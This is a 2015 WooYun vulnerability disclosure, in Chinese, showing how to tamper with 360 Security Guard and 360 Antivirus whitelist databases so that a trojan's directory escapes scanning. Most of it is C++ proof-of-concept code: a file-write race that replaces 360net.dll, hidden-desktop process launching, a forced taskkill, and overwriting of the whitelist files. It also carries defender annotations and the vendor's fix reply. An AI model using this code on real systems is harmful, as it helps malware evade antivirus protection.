
漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096329

漏洞标题:提权替换360信任列表数据库添加目录到扫描白名单(木马躲避杀毒技巧)

相关厂商:奇虎360

漏洞作者: 路人甲

提交时间:2015-02-25 15:29

修复时间:2015-05-27 10:18

公开时间:2015-05-27 10:18

漏洞类型:非授权访问/认证绕过

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2015-02-25: 细节已通知厂商并且等待厂商处理中
2015-02-26: 厂商已经确认,细节仅向厂商公开
2015-03-01: 细节向第三方安全合作伙伴开放
2015-04-22: 细节向核心白帽子及相关领域专家公开
2015-05-02: 细节向普通白帽子公开
2015-05-12: 细节向实习白帽子公开
2015-05-27: 细节向公众公开

简要描述:

提升权限将特定目录添加到360安全卫士和杀毒的白名单中。

详细说明:

通过创建虚拟桌面提升自身权限,释放预先设定好的白名单数据库文件替换掉现有白名单数据库文件speedmem2.hg和sl2.db,达到将指定目录添加为信任目录的结果,致使木马逃避掉360杀毒的扫描。

2.jpg


444.png

漏洞证明:

提升权限部分:

// File-scope module handle; it is not referenced anywhere in the code shown on this page.
HINSTANCE hInstance = NULL;
// Thread entry (lpParameter is unused). Watches the user's
// "Local Settings\Temp" directory with ReadDirectoryChangesW and, when a
// change record whose name contains "360net.dll" is reported as MODIFIED,
// copies a local "Dll.dll" over that file. Returns 1 when that copy
// succeeded and 0 otherwise; exits the whole process if the directory
// cannot be opened.
// Defender notes: the observable behaviour is a directory-change watch on
// %USERPROFILE%\Local Settings\Temp followed by a write to a file named
// 360net.dll beneath it, i.e. a file-write race against whatever drops that
// DLL there. The code shown never checks who dropped the file.
DWORD WINAPI MainBacak(LPVOID lpParameter)
{
SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS );
char MydirPath[MAX_PATH];
// CSIDL_PROFILE resolves to the current user's profile directory.
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
const int buf_size = 1024;
CHAR buf[buf_size];
DWORD dwBufWrittenSize;
HANDLE hDir;
// FILE_FLAG_BACKUP_SEMANTICS is what allows CreateFile to open a directory.
hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE)
{
// NOTE(review): CloseHandle on INVALID_HANDLE_VALUE does nothing useful;
// the process simply terminates when the watch directory cannot be opened.
CloseHandle(hDir);
exit(0);
}
while(1)
{
// Synchronous call: blocks until the directory reports a change.
// TRUE = watch the whole subtree; the filter asks for every change type.
if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE ,
FILE_NOTIFY_CHANGE_FILE_NAME|
FILE_NOTIFY_CHANGE_DIR_NAME|
FILE_NOTIFY_CHANGE_ATTRIBUTES|
FILE_NOTIFY_CHANGE_SIZE|
FILE_NOTIFY_CHANGE_LAST_WRITE|
FILE_NOTIFY_CHANGE_LAST_ACCESS|
FILE_NOTIFY_CHANGE_CREATION|
FILE_NOTIFY_CHANGE_SECURITY,
&dwBufWrittenSize, NULL, NULL))
{
// Only the first FILE_NOTIFY_INFORMATION record in buf is examined;
// NextEntryOffset is never followed, so further records in the same
// batch are dropped.
FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf;
char* pszMultiByte;
pszMultiByte = new char[512];
ZeroMemory( pszMultiByte, 512);
// FileNameLength is a byte count, hence /2 for the WCHAR count. The
// name is relative to the watched directory.
WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL);

char *p;
p=strstr(pszMultiByte,"360net.dll");
// NOTE(review): pszMultiByte is only freed on the branches inside this
// if, so every non-matching notification leaks 512 bytes.
if(p!=NULL)
{
char tmp360net[MAX_PATH]={0};
// NOTE(review): unbounded copy of a buffer that can hold up to 511
// characters into a MAX_PATH-sized array.
lstrcpy(tmp360net,pszMultiByte);
switch(pfiNotifyInfo->Action)
{
case FILE_ACTION_ADDED:
delete []pszMultiByte;
break;
case FILE_ACTION_REMOVED:
delete []pszMultiByte;
break;
case FILE_ACTION_MODIFIED:
// MyDir (which already ends in a backslash) is extended in place
// with the reported relative name; "Dll.dll" is resolved against
// the current working directory and FALSE lets CopyFile overwrite.
lstrcat(MyDir,tmp360net);
if (CopyFile("Dll.dll",MyDir,FALSE)!=0)
{
delete []pszMultiByte;
CloseHandle(hDir);
return 1;

}
else
{
delete []pszMultiByte;
// hDir is not closed on this path; the break below is unreachable.
return 0;
break;
}


default:
break;
}
}

}

}
CloseHandle(hDir);
return 0;
}
// Thread entry. Creates a desktop named "Virtual" and starts the executable
// whose path is passed in lpParameter on that desktop with its window
// hidden, so nothing appears on the interactive desktop. Returns 0 when
// CreateProcess fails and 1 when it succeeds.
// NOTE(review): the report calls this step "privilege elevation"; the code
// here only launches the given program on a separate desktop. Any elevation
// presumably comes from what that program does, which is outside this
// listing. The return value of CreateDesktop is never checked, and on the
// success path neither pi.hThread/pi.hProcess nor hDesk is closed.
DWORD WINAPI MainDesk(LPVOID lpParameter)
{
HDESK hDesk = CreateDesktop("Virtual",
NULL,
NULL,
DF_ALLOWOTHERACCOUNTHOOK,
DESKTOP_CREATEWINDOW|
DESKTOP_ENUMERATE|
DESKTOP_READOBJECTS|
DESKTOP_WRITEOBJECTS|
DESKTOP_HOOKCONTROL ,
NULL
);
STARTUPINFO si = {sizeof(si)};
// lpDesktop names the desktop the new process is attached to.
si.lpDesktop = "Virtual";
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi = {0};
// lpParameter is used as the mutable command line (CreateProcess may write
// to it); in main it is the tmp360safe buffer.
if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseDesktop(hDesk);
return 0;
}
return 1;
}
// Program entry for the first half of the proof of concept.
// 1. Reads the 360safe.exe install directory from the App Paths registry
//    key (native view first, then Wow6432Node) into safe.
// 2. Builds the path modules\360Inst.exe under it and resolves the user's
//    "Local Settings\Temp" directory into MyDir.
// 3. As posted, shows MyDir in a message box and calls ExitProcess(0), so
//    the thread loop that follows is never reached in this listing.
// The loop, when reached, repeatedly starts MainBacak (directory watcher,
// highest thread priority) and MainDesk (runs 360Inst.exe on a hidden
// desktop, lowest priority), retries when MainDesk fails, and sleeps 15 s
// whenever MainBacak reports a successful file replacement.
// NOTE(review): safe is never initialized when neither registry key exists
// yet is still copied; RegQueryValueEx results are unchecked; handle has
// two elements, so every handle[2] access is out of bounds (undefined
// behavior); on the continue path the MainBacak thread keeps running after
// its handle is closed.
int main(int argc, char* argv[])
{
char safe[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
// 32-bit product on a 64-bit Windows is registered under Wow6432Node.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MyDir[MAX_PATH];
SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0);
strcat(MyDir,"\\Local Settings\\Temp\\");
// Debug output left in the posted listing; the process ends right after it.
MessageBox(NULL,MyDir,NULL,NULL);
ExitProcess(0);
// access(path, 0) tests for existence only.
if (access(tmp360safe,0)==0)
{
while(1)
{
HANDLE handle[2];
// Watcher thread: created suspended so its priority can be raised first.
handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST);
ResumeThread(handle[1]);
// Launcher thread; tmp360safe is passed as its command line.
handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST);
ResumeThread(handle[2]);
WaitForSingleObject(handle[2],INFINITE);
DWORD lpExitCode2;
GetExitCodeThread(handle[2],&lpExitCode2);
// MainDesk returns 0 when CreateProcess failed: retry immediately.
if (lpExitCode2==0)
{
CloseHandle(handle[2]);
CloseHandle(handle[1]);
continue;
}
WaitForSingleObject(handle[1],INFINITE);
DWORD lpExitCode;
GetExitCodeThread(handle[1],&lpExitCode);
// MainBacak returns 1 only when its CopyFile succeeded.
if (lpExitCode==1)
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
Sleep(15000);
}
else
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
}
}
}

return 0;
}


替换白名单数据库部分:

// Returns a value in [0, count) derived from rand() and the tick count; the
// caller below uses it to vary single letters in temporary file names.
// No srand() call appears in this listing, so rand() runs from the default
// seed. seed*Time is evaluated in unsigned long (Time's type) and then
// reduced modulo count; a count of 0 would divide by zero.
int Storm(int count)
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%count;
return seed;
}
// EnumWindows callback: posts WM_CLOSE to every top-level window on the
// caller's desktop and returns TRUE to keep enumerating. The second
// parameter (spelled IParam here, conventionally lParam) is unused.
BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)//callback function
{
PostMessage(hwnd, WM_CLOSE, 0, 0);
return TRUE;
}
// Exported DLL entry point; the name does not describe what it does.
// Sequence as written: kill load.exe, post WM_CLOSE to every top-level
// window, look up the 360safe.exe and 360sd.exe install directories from
// the App Paths registry keys, write two prepared whitelist database files
// into the user's "Local Settings\Temp" under partly randomized names, then
// delete the product's own deepscan\speedmem2.hg (360safe) and sl2.db
// (360sd) and copy the prepared files into their place. speedmemSaveFile
// and sdSaveFile are not part of this listing (see the note after the code).
// Defender notes: the two overwritten files live inside the product's own
// install directories; a deletion or write to them from a process that is
// not the product, a taskkill of load.exe, and short-lived *.hg / *.ds files
// in %USERPROFILE%\Local Settings\Temp are the observable artifacts.
// NOTE(review): safe and SD stay uninitialized when the corresponding
// registry keys are missing; every RegQueryValueEx, DeleteFile and CopyFile
// result is ignored, so failures are silent; tmp360safe is built but unused
// in this function.
extern "C" __declspec(dllexport)void HttpCreateDownloadObj()
{
char taskkill[MAX_PATH];
wsprintf(taskkill,"taskkill /im load.exe /f");
WinExec(taskkill,SW_HIDE);
EnumWindows(EnumWindowsProc,0);
char safe[MAX_PATH];
char SD[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
DWORD buffSize1=sizeof(SD);
// 360safe install directory: native registry view, then Wow6432Node.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}

// 360sd install directory, same two-view lookup.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
CHAR speedmem[MAX_PATH];
// Each 'a'+Storm(26) substitutes one lowercase letter, so the staging file
// names differ from run to run. MyDir already ends in a backslash, so the
// resulting paths contain a doubled separator.
wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26));
CHAR slD[MAX_PATH];
wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26));
// Both helpers are defined outside this listing; per the report they write
// the prepared database contents to the given paths.
speedmemSaveFile(speedmem);
sdSaveFile(slD);
CHAR Newspeedmem[MAX_PATH];
wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe);
CHAR NewslD[MAX_PATH];
wsprintf(NewslD,"%s\\sl2.db",SD);
// Replace the product's files, then remove the staging copies.
DeleteFile(Newspeedmem);
DeleteFile(NewslD);
CopyFile(speedmem,Newspeedmem,FALSE);
CopyFile(slD,NewslD,FALSE);
DeleteFile(speedmem);
DeleteFile(slD);
return;
}


speedmemSaveFile与sdSaveFile分别用于生成事先在360杀毒和360安全卫士中设定好路径的白名单数据库文件。

修复方案:

你们自然晓得怎么修复啦:P

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-26 10:17

厂商回复:

感谢乌云白帽子的报告
此问题是通过360安全卫士中一处防御缺陷突破信任机制实现的白名单篡改。

我们在一个月以前就已经从其它渠道获知了该漏洞并进行了修复和升级,目前外网的最新版360都不存在此问题。

最新状态:

暂无